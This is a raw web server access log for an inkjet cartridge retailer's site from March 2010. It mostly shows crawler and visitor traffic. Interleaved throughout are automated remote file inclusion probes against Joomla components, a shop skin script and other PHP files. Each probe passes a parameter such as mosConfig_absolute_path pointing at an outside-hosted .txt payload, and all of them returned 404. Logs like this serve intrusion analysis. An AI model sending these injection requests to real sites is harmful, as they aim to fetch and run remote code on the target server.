67.195.115.218 - - [02/Mar/2010:10:10:21 -0800] "GET /links/?M=D HTTP/1.0" 200 6595 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:10:17:12 -0800] "GET /phpbb/viewtopic.php?t=1630 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
98.237.240.215 - - [02/Mar/2010:10:18:31 -0800] "GET /email/images/inkmail17_01.gif HTTP/1.1" 200 6130 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FunWebProducts; Comcast Install 1.0; GTB6.4; .NET CLR 1.1.4322; Zango 10.3.37.0; WinTSI 18.09.2009; [xSP_2:a79f05fded9974e07ca283582077576c_195]; 986700194603)" "site.inkjetcartridge.com"
98.237.240.215 - - [02/Mar/2010:10:18:31 -0800] "GET /email/images/inkmail17_02.gif HTTP/1.1" 200 17125 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FunWebProducts; Comcast Install 1.0; GTB6.4; .NET CLR 1.1.4322; Zango 10.3.37.0; WinTSI 18.09.2009; [xSP_2:a79f05fded9974e07ca283582077576c_195]; 986700194603)" "site.inkjetcartridge.com"
77.241.83.107 - - [02/Mar/2010:10:20:17 -0800] "GET //index.php?DOCUMENT_ROOT=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.241.83.107 - - [02/Mar/2010:10:20:17 -0800] "GET /logs/access.log%20%20///index.php?DOCUMENT_ROOT=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.241.83.107 - - [02/Mar/2010:10:20:17 -0800] "GET /logs///index.php?DOCUMENT_ROOT=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.241.83.107 - - [02/Mar/2010:10:20:28 -0800] "GET /logs/access.log%20%20///index.php?DOCUMENT_ROOT=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.241.83.107 - - [02/Mar/2010:10:20:28 -0800] "GET //index.php?DOCUMENT_ROOT=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.241.83.107 - - [02/Mar/2010:10:20:28 -0800] "GET /logs///index.php?DOCUMENT_ROOT=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:10:23:01 -0800] "GET /phpbb/viewtopic.php?t=1388&highlight= HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:10:23:38 -0800] "GET /phpbb/viewtopic.php?t=598 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:10:23:39 -0800] "GET /phpbb/viewtopic.php?t=587 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
210.205.6.233 - - [02/Mar/2010:10:25:40 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
210.205.6.233 - - [02/Mar/2010:10:25:40 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
210.205.6.233 - - [02/Mar/2010:10:25:40 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:10:27:40 -0800] "GET /phpbb/viewtopic.php?t=998 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
98.237.240.215 - - [02/Mar/2010:10:28:33 -0800] "GET /email/images/inkmail19_02.gif HTTP/1.1" 200 6629 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FunWebProducts; Comcast Install 1.0; GTB6.4; .NET CLR 1.1.4322; Zango 10.3.37.0; WinTSI 18.09.2009; [xSP_2:a79f05fded9974e07ca283582077576c_195]; 986700194603)" "site.inkjetcartridge.com"
98.237.240.215 - - [02/Mar/2010:10:28:33 -0800] "GET /email/images/inkmail19_01.gif HTTP/1.1" 200 20396 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FunWebProducts; Comcast Install 1.0; GTB6.4; .NET CLR 1.1.4322; Zango 10.3.37.0; WinTSI 18.09.2009; [xSP_2:a79f05fded9974e07ca283582077576c_195]; 986700194603)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:10:28:55 -0800] "GET /phpbb/viewtopic.php?t=2263&highlight= HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:10:29:24 -0800] "GET /phpbb/viewtopic.php?p=2363 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:10:30:14 -0800] "GET /phpbb/viewtopic.php?t=101 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:10:33:14 -0800] "GET /phpbb/viewtopic.php?t=1571 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:35:08 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:35:08 -0800] "GET /logs/access_100101.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:35:08 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:35:14 -0800] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:35:50 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:35:50 -0800] "GET /logs/access_100101.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:35:50 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:35:55 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:35:58 -0800] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.94.193.152 - - [02/Mar/2010:10:36:03 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.94.193.152 - - [02/Mar/2010:10:36:03 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.94.193.152 - - [02/Mar/2010:10:36:03 -0800] "GET /logs/access_100101.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
213.251.189.201 - - [02/Mar/2010:10:36:12 -0800] "GET /conf.php?subdir=http://nic.bupt.edu.cn/media/ahhe.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
213.251.189.201 - - [02/Mar/2010:10:36:12 -0800] "GET /logs//conf.php?subdir=http://nic.bupt.edu.cn/media/ahhe.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
219.94.193.152 - - [02/Mar/2010:10:36:18 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.94.193.152 - - [02/Mar/2010:10:36:18 -0800] "GET /logs/access_100101.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.94.193.152 - - [02/Mar/2010:10:36:18 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:36:25 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:36:25 -0800] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.94.193.152 - - [02/Mar/2010:10:36:54 -0800] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:10:41:56 -0800] "GET /links/links25_2.html HTTP/1.0" 200 35326 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:10:43:52 -0800] "GET /phpbb/viewtopic.php?p=251 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
83.133.64.184 - - [02/Mar/2010:10:44:29 -0800] "GET /logs/access.log//board//board/include/bbs.lib.inc.php=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
83.133.64.184 - - [02/Mar/2010:10:44:29 -0800] "GET /board//board/include/bbs.lib.inc.php=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
83.133.64.184 - - [02/Mar/2010:10:44:29 -0800] "GET /logs//board//board/include/bbs.lib.inc.php=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
24.131.119.199 - - [02/Mar/2010:10:45:51 -0800] "GET /images/epson-c88.jpg HTTP/1.1" 200 6555 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTBDFff GTB7.0 (.NET CLR 3.5.30729)" "site.inkjetcartridge.com"
24.131.119.199 - - [02/Mar/2010:10:45:51 -0800] "GET /images/canon-pixma-ip3500.jpg HTTP/1.1" 200 39459 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTBDFff GTB7.0 (.NET CLR 3.5.30729)" "site.inkjetcartridge.com"
24.131.119.199 - - [02/Mar/2010:10:45:51 -0800] "GET /images/brother-mfc-240cn.jpg HTTP/1.1" 200 23620 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTBDFff GTB7.0 (.NET CLR 3.5.30729)" "site.inkjetcartridge.com"
24.131.119.199 - - [02/Mar/2010:10:45:51 -0800] "GET /images/brother-mfc-5460cn.jpg HTTP/1.1" 200 20615 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTBDFff GTB7.0 (.NET CLR 3.5.30729)" "site.inkjetcartridge.com"
24.131.119.199 - - [02/Mar/2010:10:45:51 -0800] "GET /images/canon-pixma-pro9000.jpg HTTP/1.1" 200 24854 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTBDFff GTB7.0 (.NET CLR 3.5.30729)" "site.inkjetcartridge.com"
83.133.64.184 - - [02/Mar/2010:10:47:02 -0800] "GET /logs/access.log//board//board/include/bbs.lib.inc.php=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
83.133.64.184 - - [02/Mar/2010:10:47:02 -0800] "GET /board//board/include/bbs.lib.inc.php=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
83.133.64.184 - - [02/Mar/2010:10:47:02 -0800] "GET /logs//board//board/include/bbs.lib.inc.php=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:10:51:34 -0800] "GET /phpbb/viewtopic.php?p=490 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:51:59 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:52:00 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:52:00 -0800] "GET /logs/access.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:10:52:12 -0800] "GET /phpbb/viewtopic.php?p=2427 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:10:52:18 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:10:52:18 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:10:52:19 -0800] "GET /logs/access_100101.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [02/Mar/2010:10:52:23 -0800] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:53:13 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:53:14 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:53:18 -0800] "GET /logs/access.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:55:21 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:55:21 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [02/Mar/2010:10:55:22 -0800] "GET /logs/access.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.94.193.152 - - [02/Mar/2010:10:59:03 -0800] "GET /logs/access.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.94.193.152 - - [02/Mar/2010:10:59:42 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.94.193.152 - - [02/Mar/2010:10:59:42 -0800] "GET /logs/access.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.94.193.152 - - [02/Mar/2010:10:59:42 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.94.193.152 - - [02/Mar/2010:11:00:16 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.94.193.152 - - [02/Mar/2010:11:00:16 -0800] "GET /logs/access.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:11:01:04 -0800] "GET /phpbb/viewtopic.php?t=16&start=690 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:11:01:07 -0800] "GET /phpbb/viewtopic.php?p=5161 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:11:04:59 -0800] "GET /phpbb/viewtopic.php?t=2423 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:11:10:26 -0800] "GET /phpbb/viewtopic.php?p=1885 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:11:10:27 -0800] "GET /tmp/?M=D HTTP/1.0" 200 786 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
65.55.110.39 - - [02/Mar/2010:11:14:51 -0800] "GET /links/links7_2.html HTTP/1.1" 200 29360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:11:17:44 -0800] "GET /phpbb/viewtopic.php?t=599 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
74.53.3.132 - - [02/Mar/2010:11:18:11 -0800] "GET /robots.txt HTTP/1.0" 404 - "http://site.inkjetcartridge.com/links/links16.html" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
74.53.3.132 - - [02/Mar/2010:11:18:55 -0800] "GET /links/links16.html HTTP/1.0" 200 29593 "-" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
71.176.150.133 - - [02/Mar/2010:11:19:49 -0800] "GET /email/images/inkmail20_02.gif HTTP/1.1" 200 6519 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
71.176.150.133 - - [02/Mar/2010:11:19:49 -0800] "GET /email/images/inkmail20_01.gif HTTP/1.1" 200 20486 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
71.176.150.133 - - [02/Mar/2010:11:19:50 -0800] "GET /email/images/inkmail20_05.gif HTTP/1.1" 200 15268 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
71.176.150.133 - - [02/Mar/2010:11:19:50 -0800] "GET /email/images/inkmail20_06.gif HTTP/1.1" 200 17301 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
71.176.150.133 - - [02/Mar/2010:11:19:50 -0800] "GET /email/images/inkmail20_07.gif HTTP/1.1" 200 17556 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
74.53.3.132 - - [02/Mar/2010:11:20:18 -0800] "GET /links/links25.html HTTP/1.0" 200 30326 "-" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
74.53.3.132 - - [02/Mar/2010:11:21:49 -0800] "GET /links/links14.html HTTP/1.0" 200 27471 "-" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
76.7.0.16 - - [02/Mar/2010:11:21:57 -0800] "GET /links/links19_3.html HTTP/1.1" 200 37767 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2;GB)" "site.inkjetcartridge.com"
76.7.0.16 - - [02/Mar/2010:11:21:58 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Zune 8.1.71; Dealio Toolbar 4.6.22)" "site.inkjetcartridge.com"
76.7.0.16 - - [02/Mar/2010:11:21:58 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Zune 8.1.71; Dealio Toolbar 4.6.22)" "site.inkjetcartridge.com"
74.53.3.132 - - [02/Mar/2010:11:23:16 -0800] "GET /links/links1.html HTTP/1.0" 200 12159 "-" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
89.108.64.216 - - [02/Mar/2010:11:24:02 -0800] "GET /logs/access.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "site.inkjetcartridge.com"
89.108.64.216 - - [02/Mar/2010:11:24:02 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "site.inkjetcartridge.com"
89.108.64.216 - - [02/Mar/2010:11:24:02 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "site.inkjetcartridge.com"
